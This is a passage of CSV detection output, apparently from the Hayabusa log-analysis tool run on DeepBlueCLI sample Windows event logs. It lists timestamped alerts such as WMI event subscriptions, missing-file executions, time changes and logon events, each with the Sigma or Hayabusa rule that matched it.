Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:56:26.275 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:56:26.275 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:56:26.275 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:56:26.275 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:56:28.619 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:56:36.634 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:56:36.634 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:56:36.649 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 05:56:52.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 05:56:52.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 06:05:37.180 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x2b18a,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 06:07:06.390 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 06:07:06.390 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 06:07:31.859 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 06:07:35.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 06:07:44.487 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 06:07:44.487 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 06:07:44.487 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 06:09:53.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 06:09:53.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 06:10:53.299 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 06:13:38.283 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 06:13:38.283 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x25519 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 06:13:38.283 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x2553c : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 06:13:38.283 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x25519,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 06:35:27.013 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 06:35:27.013 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 06:35:27.028 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 06:50:27.138 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IEUser : Target User: rdavis : IP Address: - : Process: : Target Server: cifs/rdavis-7.sharplogic.local,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 06:53:45.841 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: - : Process: C:\Windows\System32\svchost.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 06:53:45.841 +09:00,IE8Win7,4624,informational,Logon Type 4 - Batch,User: IEUser : Workstation: IE8WIN7 : IP Address: - : Port: - : LogonID: 0x15f454,rules/hayabusa/default/events/Security/Logons/4624_LogonType-4-Batch.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 06:53:45.841 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x15f454,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 06:53:45.919 +09:00,IE8Win7,4634,informational,Logoff,User: IEUser : LogonID: 0x15f454,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 06:53:46.263 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: - : Process: C:\Windows\System32\lsass.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 06:53:46.263 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: - : Port: - : LogonID: 0x15f53a : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 06:53:46.263 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: - : Port: - : LogonID: 0x15f546 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 06:53:46.263 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x15f53a,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 06:53:46.669 +09:00,IE8Win7,4634,informational,Logoff,User: IEUser : LogonID: 0x15f546,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 06:53:46.669 +09:00,IE8Win7,4634,informational,Logoff,User: IEUser : LogonID: 0x15f53a,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 06:54:01.732 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x2553c,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 06:55:02.343 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 06:55:02.343 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 06:55:25.000 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 06:55:32.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 06:55:35.625 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 06:55:35.625 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0xdad4 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 06:55:35.625 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0xdafc : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 06:55:35.625 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0xdad4,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 06:55:37.450 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 06:55:37.450 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 06:55:37.450 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 06:55:44.840 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: - : Process: C:\Windows\System32\svchost.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 06:55:44.840 +09:00,IE8Win7,4624,informational,Logon Type 4 - Batch,User: IEUser : Workstation: IE8WIN7 : IP Address: - : Port: - : LogonID: 0x13dbc,rules/hayabusa/default/events/Security/Logons/4624_LogonType-4-Batch.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 06:55:44.840 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x13dbc,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 06:57:51.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 06:57:51.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 07:00:55.356 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0xdafc,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 07:00:55.903 +09:00,IE8Win7,4634,informational,Logoff,User: IEUser : LogonID: 0xdafc,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 07:00:55.903 +09:00,IE8Win7,4634,informational,Logoff,User: IEUser : LogonID: 0xdad4,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 07:01:28.840 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 07:01:28.840 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x4bafc : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 07:01:28.840 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x4bb14 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 07:01:28.840 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x4bafc,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 07:04:16.809 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x4bb14,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 07:05:00.218 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 07:05:00.218 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 07:05:21.859 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 07:05:31.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 07:05:32.609 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 07:05:32.609 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0xd99e : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 07:05:32.609 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0xd9c6 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 07:05:32.609 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0xd99e,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 07:05:36.944 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 07:05:36.944 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 07:05:36.944 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 07:05:40.928 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: - : Process: C:\Windows\System32\svchost.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 07:05:40.928 +09:00,IE8Win7,4624,informational,Logon Type 4 - Batch,User: IEUser : Workstation: IE8WIN7 : IP Address: - : Port: - : LogonID: 0x144df,rules/hayabusa/default/events/Security/Logons/4624_LogonType-4-Batch.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 07:05:40.928 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x144df,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 07:08:00.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 07:08:00.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 07:10:10.631 +09:00,IE8Win7,9,medium,Raw Disk Access Using Illegitimate Tools,,rules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 08:11:15.779 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 08:11:15.779 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 08:11:15.779 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-22 08:29:47.424 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-22 08:29:47.424 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-22 08:29:47.424 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-22 08:29:47.424 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-22 08:29:47.424 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-22 08:29:47.424 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-22 08:29:47.424 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-22 08:29:47.517 +09:00,IE8Win7,9,medium,Raw Disk Access Using Illegitimate Tools,,rules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-22 08:30:12.392 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-22 08:30:12.392 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-22 08:32:12.657 +09:00,IE8Win7,4634,informational,Logoff,User: IEUser : LogonID: 0x144df,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-22 08:34:00.063 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IEUser : Target User: rdavis : IP Address: - : Process: : Target Server: HYPERV.sharplogic.local,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-22 08:40:48.532 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0xd9c6,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-22 08:42:11.390 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-22 08:42:11.390 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-22 08:42:34.625 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-22 08:42:43.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2014-11-22 08:42:49.610 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-22 08:42:49.610 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-22 08:42:49.610 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-22 08:43:06.625 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-22 08:43:06.625 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x16559 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-22 08:43:06.625 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x16589 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-22 08:43:06.625 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x16559,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-22 08:44:23.818 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-22 08:44:23.818 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-22 08:44:23.849 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-22 08:45:01.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2014-11-22 08:45:01.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2014-11-22 08:45:09.380 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-22 08:45:09.380 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-22 08:45:09.380 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-22 09:34:55.380 +09:00,IE8Win7,19,high,WMI Event 